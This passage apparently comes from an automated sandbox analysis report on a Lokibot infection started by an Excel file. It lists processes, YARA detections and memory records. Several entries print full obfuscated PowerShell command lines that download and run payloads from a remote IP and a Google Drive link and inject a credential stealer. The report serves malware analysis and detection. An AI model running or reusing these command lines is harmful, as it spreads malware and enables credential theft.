1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
                                                                                            Imagebase:0x13f130000
                                                                                            File size:443'392 bytes
                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:13:51:02
                                                                                            Start date:25/10/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
                                                                                            Imagebase:0x13f130000
                                                                                            File size:443'392 bytes
                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:13:51:04
                                                                                            Start date:25/10/2024
                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                            Imagebase:0x13f6c0000
                                                                                            File size:13'824 bytes
                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:10
                                                                                            Start time:13:51:05
                                                                                            Start date:25/10/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline"
                                                                                            Imagebase:0x13f3a0000
                                                                                            File size:2'758'280 bytes
                                                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:13:51:06
                                                                                            Start date:25/10/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AEA.tmp" "c:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP"
                                                                                            Imagebase:0x13f6b0000
                                                                                            File size:52'744 bytes
                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:12
                                                                                            Start time:13:51:08
                                                                                            Start date:25/10/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
                                                                                            Imagebase:0x13f130000
                                                                                            File size:443'392 bytes
                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:14
                                                                                            Start time:13:51:09
                                                                                            Start date:25/10/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
                                                                                            Imagebase:0x13f130000
                                                                                            File size:443'392 bytes
                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:16
                                                                                            Start time:13:51:12
                                                                                            Start date:25/10/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline"
                                                                                            Imagebase:0x13fbf0000
                                                                                            File size:2'758'280 bytes
                                                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:17
                                                                                            Start time:13:51:12
                                                                                            Start date:25/10/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9251.tmp" "c:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP"
                                                                                            Imagebase:0x13fcf0000
                                                                                            File size:52'744 bytes
                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:19
                                                                                            Start time:13:51:16
                                                                                            Start date:25/10/2024
                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
                                                                                            Imagebase:0xfff80000
                                                                                            File size:168'960 bytes
                                                                                            MD5 hash:045451FA238A75305CC26AC982472367
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:20
                                                                                            Start time:13:51:22
                                                                                            Start date:25/10/2024
                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
                                                                                            Imagebase:0xffc50000
                                                                                            File size:168'960 bytes
                                                                                            MD5 hash:045451FA238A75305CC26AC982472367
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:21
                                                                                            Start time:13:51:23
                                                                                            Start date:25/10/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                            Imagebase:0x13f130000
                                                                                            File size:443'392 bytes
                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:23
                                                                                            Start time:13:51:23
                                                                                            Start date:25/10/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
                                                                                            Imagebase:0x13f130000
                                                                                            File size:443'392 bytes
                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:26
                                                                                            Start time:13:51:47
                                                                                            Start date:25/10/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                                                                                            Imagebase:0x1270000
                                                                                            File size:45'160 bytes
                                                                                            MD5 hash:04AA198D72229AEED129DC20201BF030
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Loki_1, Description: Loki Payload, Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            Has exited:false

                                                                                            Call Graph

                                                                                            • Entrypoint
                                                                                            • Decryption Function
                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            • Show Help
                                                                                            callgraph 1 Error: Graph is empty

                                                                                            Module: Sheet1

                                                                                            Declaration
                                                                                            LineContent
                                                                                            1

                                                                                            Attribute VB_Name = "Sheet1"

                                                                                            2

                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                            3

                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                            4

                                                                                            Attribute VB_Creatable = False

                                                                                            5

                                                                                            Attribute VB_PredeclaredId = True

                                                                                            6

                                                                                            Attribute VB_Exposed = True

                                                                                            7

                                                                                            Attribute VB_TemplateDerived = False

                                                                                            8

                                                                                            Attribute VB_Customizable = True

                                                                                            Module: Sheet2

                                                                                            Declaration
                                                                                            LineContent
                                                                                            1

                                                                                            Attribute VB_Name = "Sheet2"

                                                                                            2

                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                            3

                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                            4

                                                                                            Attribute VB_Creatable = False

                                                                                            5

                                                                                            Attribute VB_PredeclaredId = True

                                                                                            6

                                                                                            Attribute VB_Exposed = True

                                                                                            7

                                                                                            Attribute VB_TemplateDerived = False

                                                                                            8

                                                                                            Attribute VB_Customizable = True

                                                                                            Module: Sheet3

                                                                                            Declaration
                                                                                            LineContent
                                                                                            1

                                                                                            Attribute VB_Name = "Sheet3"

                                                                                            2

                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                            3

                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                            4

                                                                                            Attribute VB_Creatable = False

                                                                                            5

                                                                                            Attribute VB_PredeclaredId = True

                                                                                            6

                                                                                            Attribute VB_Exposed = True

                                                                                            7

                                                                                            Attribute VB_TemplateDerived = False

                                                                                            8

                                                                                            Attribute VB_Customizable = True

                                                                                            Module: ThisWorkbook

                                                                                            Declaration
                                                                                            LineContent
                                                                                            1

                                                                                            Attribute VB_Name = "ThisWorkbook"

                                                                                            2

                                                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                            3

                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                            4

                                                                                            Attribute VB_Creatable = False

                                                                                            5

                                                                                            Attribute VB_PredeclaredId = True

                                                                                            6

                                                                                            Attribute VB_Exposed = True

                                                                                            7

                                                                                            Attribute VB_TemplateDerived = False

                                                                                            8

                                                                                            Attribute VB_Customizable = True

                                                                                            Reset < >
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.463003055.00000000029D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_29d0000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction ID: 67e76dc1c73e36f3db2bc0b6d7daf0ec1cc2853d409592385e390610c388bcee
                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.463003055.00000000029D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_29d0000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction ID: 67e76dc1c73e36f3db2bc0b6d7daf0ec1cc2853d409592385e390610c388bcee
                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.463003055.00000000029D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_29d0000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction ID: 67e76dc1c73e36f3db2bc0b6d7daf0ec1cc2853d409592385e390610c388bcee
                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.463003055.00000000029D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_29d0000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction ID: 67e76dc1c73e36f3db2bc0b6d7daf0ec1cc2853d409592385e390610c388bcee
                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.463003055.00000000029D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_29d0000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction ID: 67e76dc1c73e36f3db2bc0b6d7daf0ec1cc2853d409592385e390610c388bcee
                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction Fuzzy Hash:

                                                                                              Execution Graph

                                                                                              Execution Coverage:5.3%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:50%
                                                                                              Total number of Nodes:6
                                                                                              Total number of Limit Nodes:0
                                                                                              execution_graph 2209 7fe89a059f1 2210 7fe89a05a01 URLDownloadToFileW 2209->2210 2212 7fe89a05b10 2210->2212 2213 7fe89a04b18 2214 7fe89a05a40 URLDownloadToFileW 2213->2214 2216 7fe89a05b10 2214->2216

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.520571277.000007FE89A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7fe89a00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: DownloadFile
                                                                                              • String ID:
                                                                                              • API String ID: 1407266417-0
                                                                                              • Opcode ID: 0e426874c081b4db45a1fe9f0665bb7e3c36cd27da582a770319fdc14598414b
                                                                                              • Instruction ID: ebd9a5ce895f68206e477b3937b1217052628dc34e0a8dfc34020263b7bd3a1c
                                                                                              • Opcode Fuzzy Hash: 0e426874c081b4db45a1fe9f0665bb7e3c36cd27da582a770319fdc14598414b
                                                                                              • Instruction Fuzzy Hash: 23319031908A0C8FDB58DF5C98897A9BBE1FB69311F00826ED04ED3651CB70A845CB81

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.520571277.000007FE89A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7fe89a00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: DownloadFile
                                                                                              • String ID:
                                                                                              • API String ID: 1407266417-0
                                                                                              • Opcode ID: 5e59e8b10a72a0aa8c727c5273a5b5f4e79558804f2091dd6c9613c7c211d229
                                                                                              • Instruction ID: cb074e1a4b143c5f0c542b91451b83ec977fcf712b1fbd1b91fc414deed79253
                                                                                              • Opcode Fuzzy Hash: 5e59e8b10a72a0aa8c727c5273a5b5f4e79558804f2091dd6c9613c7c211d229
                                                                                              • Instruction Fuzzy Hash: B241E23191CB889FDB1ADB5898487E9BBF0FB66321F0482AFD089D3152CB646846C791

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
